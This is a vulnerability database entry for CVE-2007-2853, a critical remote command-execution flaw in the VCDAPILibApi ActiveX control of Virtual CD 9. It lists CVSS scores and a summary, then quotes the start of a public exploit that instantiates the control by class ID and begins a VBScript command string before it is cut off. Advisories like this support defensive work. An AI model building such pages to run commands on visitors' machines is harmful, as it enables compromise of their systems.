10
CVSSv2

CVE-2007-2853

Published: 24/05/2007 Updated: 11/10/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The VCDAPILibApi ActiveX control in vc9api.DLL 9.0.0.57 in Virtual CD 9.0.0.2 allows remote malicious users to execute arbitrary commands via a command line in the first argument to the VCDLaunchAndWait function.

Vulnerable Product Search on Vulmon Subscribe to Product

h\\+h vcdapilibapi activex control 9.0.0.57

h\\+h virtual cd 9.0.0.2

Exploits

<!-- IE 6 / Virtual CD 9002 (vc9apiDLL 90057) remote shell commands execution exploit by rgod site: retrogodaltervistaorg software site: wwwvirtualcd-onlinecom/ --> <html> <object classid='clsid:C75848D7-72BD-499C-80F3-FD0ED62DF58C' id='VCDAPILibApi'></object> <script language='vbscript'> strCmd="cm ...